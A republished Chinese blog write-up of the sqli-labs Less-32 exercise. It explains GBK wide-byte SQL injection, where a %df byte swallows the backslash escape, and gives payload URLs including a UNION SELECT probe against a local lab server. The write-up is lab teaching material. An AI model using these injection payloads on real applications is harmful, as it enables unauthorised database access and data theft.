SQL注入:sqli-labs 32 宽字节注入
Posted Zeker62
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQL注入:sqli-labs 32 宽字节注入相关的知识,希望对你有一定的参考价值。
http://127.0.0.1/sqli/Less-32/?id=1
不报错http://127.0.0.1/sqli/Less-32/?id=1'
发现下面的信息框里面多了一个转义字符:
Hint: The Query String you input is escaped as : 1’
The Query String you input in Hex becomes : 315c27- 再尝试:
http://127.0.0.1/sqli/Less-32/?id=1"
发现仍然被转义。 - 显然第二行显示信息是上一行的16进制编码
- 这里就引申出宽字节注入方式:
宽字节注入:
-
我们看到这个转义的16进制是5c,如果能够吞掉这个5c,就能够解决这个转义问题
-
如何吞掉
-
比如一个汉字:運,他的16进制编码就是df5c,正好有个5c。当然汉字 猏,aa5c也可以。
-
输入:
http://127.0.0.1/sqli/Less-32/?id=1%df'
报错:You have an error in your SQL syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ‘'1�\\'' LIMIT 0,1
’ at line 1,说明这个是用单引号括起来的字符型漏洞。然后我们就可以利用这个漏洞进行操作了 -
http://127.0.0.1/sqli/Less-32/?id=1%df' and 1=2 union select 1,2,3 --+
判断回显点
参考资料:GBK的内容:https://www.qqxiuzi.cn/zh/hanzi-gbk-bianma.php
以上是关于SQL注入:sqli-labs 32 宽字节注入的主要内容,如果未能解决你的问题,请参考以下文章
sqli-labs less34 POST- Bypass AddSlashes (POST型绕过addslashes() 函数的宽字节注入)
sqli-labs less32 GET- Bypass custom filter adding slashes to dangrous chars (GET型转义了'/"字符(代